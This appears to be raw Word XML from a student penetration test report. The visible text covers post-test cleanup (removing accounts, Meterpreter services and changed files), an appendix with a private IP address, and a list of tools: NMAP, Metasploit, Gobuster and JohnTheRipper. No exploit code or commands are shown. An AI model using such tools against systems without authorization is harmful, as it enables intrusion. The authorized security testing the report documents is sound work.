                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>242722</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5760085" cy="127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25391" id="Graphic 20" o:spid="_x0000_s1026" style="position:absolute;margin-left:70.85pt;margin-top:19.1pt;width:453.55pt;height:.1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" path="m,l5759996,e" filled="f" strokeweight=".14039mm">
                <v:path arrowok="t"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:bookmarkStart w:id="25" w:name="_bookmark18"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidR="00363D51" w:rsidRPr="00363D51">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00363D51">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">Ethical Hacking Penetration Test </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00363D51">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
      <w:r w:rsidR="00363D51">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00363D51">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>202</w:t>
      </w:r>
      <w:r w:rsidR="00363D51">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00363D51">
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00363D51">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BEA1C" w14:textId="4DD4F377" w:rsidR="005D4D8F" w:rsidRPr="00043515" w:rsidRDefault="00FC621F" w:rsidP="00043515">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="20" w:lineRule="exact"/>
        <w:ind w:left="1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8BEA6B" wp14:editId="7A8BEA6C">
                <wp:extent cx="5760085" cy="5080"/>
                <wp:effectExtent l="9525" t="0" r="0" b="4445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085" cy="5080"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5760085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527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CAB98" id="Group 24" o:spid="_x0000_s1026" style="width:453.55pt;height:.4pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="5760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">
                <v:shape id="Graphic 25" o:spid="_x0000_s1027" style="position:absolute;top:25;width:57600;height:12;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="57600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" path="m,l5759996,e" filled="f" strokeweight=".14039mm">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:bookmarkStart w:id="26" w:name="System_IP:_192.168.x.x"/>
      <w:bookmarkStart w:id="27" w:name="_bookmark21"/>
      <w:bookmarkStart w:id="28" w:name="Maintaining_Access"/>
      <w:bookmarkStart w:id="29" w:name="_bookmark22"/>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="7A8BEA1D" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F" w:rsidP="00683920">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="653"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="653" w:hanging="536"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
        </w:rPr>
        <w:t>House</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Cleaning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BEA1E" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="351" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="131" w:hanging="6"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The house cleaning portions of the assessment ensures that remnants of the penetration test are removed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Often fragments of tools or user accounts are left on an organization’s computer which can cause security issues down the road. Ensuring that we are </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>meticulous</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and no remnants of our penetration test are left over is important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BEA1F" w14:textId="696DD701" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="117" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="135" w:hanging="6"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>After</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A94354">
        <w:t>the penetration test was completed, I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>removed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accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and passwords</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A94354">
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>that I had stored</w:t>
      </w:r>
      <w:r w:rsidR="007C0A63">
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:r w:rsidR="007C0A63">
        <w:t xml:space="preserve"> (Metasploit services)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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installed</w:t>
      </w:r>
      <w:r w:rsidR="007C0A63">
        <w:t>/running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 w:rsidR="00702ED8">
        <w:t>system and</w:t>
      </w:r>
      <w:r w:rsidR="007C0A63">
        <w:t xml:space="preserve"> deleted</w:t>
      </w:r>
      <w:r w:rsidR="005C1B40">
        <w:t>/restored files that were added or changed on the target system</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BEA20" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:spacing w:line="249" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr w:rsidR="005D4D8F">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1360" w:right="1280" w:bottom="1680" w:left="1300" w:header="0" w:footer="1496" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BEA23" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F" w:rsidP="00683920">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="543"/>
        </w:tabs>
        <w:ind w:hanging="426"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="Additional_Items"/>
      <w:bookmarkStart w:id="31" w:name="_bookmark24"/>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Additional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BEA24" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="41"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BEA25" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F" w:rsidP="00683920">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="653"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="653" w:hanging="536"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="Appendix_-_Proof_and_Local_Contents:"/>
      <w:bookmarkStart w:id="33" w:name="_bookmark25"/>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
        </w:rPr>
        <w:t>Appendix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
          <w:spacing w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
        </w:rPr>
        <w:t>Proof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
        </w:rPr>
        <w:t>Local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Contents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BEA26" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="154"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="2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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="004F7DC1" w14:paraId="7A8BEA2A" w14:textId="77777777" w:rsidTr="004F7DC1">
        <w:trPr>
          <w:trHeight w:val="351"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7A8BEA27" w14:textId="77777777" w:rsidR="004F7DC1" w:rsidRDefault="004F7DC1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="125"/>
            </w:pPr>
            <w:r>
              <w:t>IP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(Hostname)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F7DC1" w14:paraId="7A8BEA2E" w14:textId="77777777" w:rsidTr="004F7DC1">
        <w:trPr>
          <w:trHeight w:val="343"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7A8BEA2B" w14:textId="1F6C9E70" w:rsidR="004F7DC1" w:rsidRDefault="004F7DC1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="129"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>192.168.1.211</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F7DC1" w14:paraId="7A8BEA32" w14:textId="77777777" w:rsidTr="004F7DC1">
        <w:trPr>
          <w:trHeight w:val="289"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1475" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A8BEA2F" w14:textId="576DBCEF" w:rsidR="004F7DC1" w:rsidRDefault="004F7DC1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A8BEA3F" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="78"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BEA40" w14:textId="7A603430" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F" w:rsidP="00683920">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="653"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="653" w:hanging="536"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="Appendix_-_Metasploit/Meterpreter_Usage"/>
      <w:bookmarkStart w:id="35" w:name="_bookmark26"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
        </w:rPr>
        <w:t>Appendix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
          <w:spacing w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D2FA1">
        <w:rPr>
          <w:color w:val="272727"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D2FA1">
        <w:rPr>
          <w:color w:val="272727"/>
        </w:rPr>
        <w:t>Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BEA42" w14:textId="2EC18E80" w:rsidR="005D4D8F" w:rsidRDefault="002D2FA1" w:rsidP="002D2FA1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
        </w:rPr>
        <w:t>NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052F49E4" w14:textId="77777777" w:rsidR="002D2FA1" w:rsidRDefault="002D2FA1" w:rsidP="002D2FA1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
        </w:rPr>
        <w:t>Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246A1A24" w14:textId="50E3BD17" w:rsidR="002D2FA1" w:rsidRDefault="002D2FA1" w:rsidP="002D2FA1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
        </w:rPr>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01F9C3DA" w14:textId="5B31B739" w:rsidR="002D2FA1" w:rsidRDefault="00B951C0" w:rsidP="002D2FA1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
        </w:rPr>
        <w:t>JohnTheRipper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A8BEA43" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="106"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BEA46" w14:textId="78C5E9ED" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="117"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="Appendix_-_Completed_Buffer_Overflow_Cod"/>
      <w:bookmarkStart w:id="37" w:name="_bookmark27"/>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:sectPr w:rsidR="005D4D8F">
      <w:footerReference w:type="default" r:id="rId26"/>
      <w:pgSz w:w="11910" w:h="16840"/>
      <w:pgMar w:top="1920" w:right="1280" w:bottom="1620" w:left="1300" w:header="0" w:footer="14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BEA75" w14:textId="77777777" w:rsidR="00FC621F" w:rsidRDefault="00FC621F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7A8BEA77" w14:textId="77777777" w:rsidR="00FC621F" w:rsidRDefault="00FC6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3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EA6D" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621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2320" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A8BEA71" wp14:editId="7A8BEA72">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>3750195</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9640759</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="59690" cy="2197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690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8BEA7D" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
                          <w:pPr>
                            <w:pStyle w:val="BodyText"/>
                            <w:spacing w:before="13"/>
                            <w:ind w:left="20"/>
                          </w:pPr>
                          <w:proofErr w:type="spellStart"/>
                          <w:r>
                            <w:rPr>
                              <w:spacing w:val="-10"/>
                            </w:rPr>
                            <w:t>i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BEA7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95.3pt;margin-top:759.1pt;width:4.7pt;height:17.3pt;z-index:-1596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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="7A8BEA7D" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
                    <w:pPr>
                      <w:pStyle w:val="BodyText"/>
                      <w:spacing w:before="13"/>
                      <w:ind w:left="20"/>
                    </w:pPr>
                    <w:proofErr w:type="spellStart"/>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-10"/>
                      </w:rPr>
                      <w:t>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EA6E" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621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1584" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A8BEA73" wp14:editId="7A8BEA74">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>3707472</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9640759</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="158115" cy="2197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11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8BEA7E" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F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BEA73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291.95pt;margin-top:759.1pt;width:12.45pt;height:17.3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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="7A8BEA7E" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F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EA6F" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621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7A8BEA75" wp14:editId="7A8BEA76">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>899998</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9617392</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5760085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8BFC5B" id="Graphic 5" o:spid="_x0000_s1026" style="position:absolute;margin-left:70.85pt;margin-top:757.25pt;width:453.55pt;height:.1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" path="m,l5759996,e" filled="f" strokeweight=".14039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7A8BEA77" wp14:editId="7A8BEA78">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>887298</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9640759</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="2609215" cy="2197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921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8BEA7F" w14:textId="2DA08C3D" w:rsidR="005D4D8F" w:rsidRDefault="007B2690">
                          <w:pPr>
                            <w:pStyle w:val="BodyText"/>
                            <w:spacing w:before="13"/>
                            <w:ind w:left="20"/>
                          </w:pPr>
                          <w:hyperlink r:id="rId1" w:history="1">
                            <w:r w:rsidRPr="00B54F97">
                              <w:rPr>
                                <w:rStyle w:val="Hyperlink"/>
                                <w:spacing w:val="-2"/>
                              </w:rPr>
                              <w:t>Jparki31@lakers.mercyhurst.edu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BEA77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69.85pt;margin-top:759.1pt;width:205.45pt;height:17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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="7A8BEA7F" w14:textId="2DA08C3D" w:rsidR="005D4D8F" w:rsidRDefault="007B2690">
                    <w:pPr>
                      <w:pStyle w:val="BodyText"/>
                      <w:spacing w:before="13"/>
                      <w:ind w:left="20"/>
                    </w:pPr>
                    <w:hyperlink r:id="rId2" w:history="1">
                      <w:r w:rsidRPr="00B54F97">
                        <w:rPr>
                          <w:rStyle w:val="Hyperlink"/>
                          <w:spacing w:val="-2"/>
                        </w:rPr>
                        <w:t>Jparki31@lakers.mercyhurst.edu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7A8BEA79" wp14:editId="7A8BEA7A">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>6553072</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9640759</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="158115" cy="2197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11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8BEA80" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F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4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8BEA79" id="Textbox 7" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:516pt;margin-top:759.1pt;width:12.45pt;height:17.3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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="7A8BEA80" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F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4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EA70" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621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4880" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A8BEA7B" wp14:editId="7A8BEA7C">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>3732872</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9640759</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="94615" cy="21971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1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8BEA81" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F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BEA7B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0" type="#_x0000_t202" style="position:absolute;margin-left:293.95pt;margin-top:759.1pt;width:7.45pt;height:17.3pt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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="7A8BEA81" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F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spacing w:val="-1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BEA71" w14:textId="77777777" w:rsidR="00FC621F" w:rsidRDefault="00FC621F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7A8BEA73" w14:textId="77777777" w:rsidR="00FC621F" w:rsidRDefault="00FC62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2008B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F8767900"/>
    <w:lvl w:ilvl="0" w:tplc="65DAF6C2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="662" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Source Sans 3" w:eastAsia="Source Sans 3" w:hAnsi="Source Sans 3" w:cs="Source Sans 3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22B605E8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1526" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="01243F60">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2393" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="CD7A7400">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3259" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A7028BBC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4126" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="155E3870">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4992" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
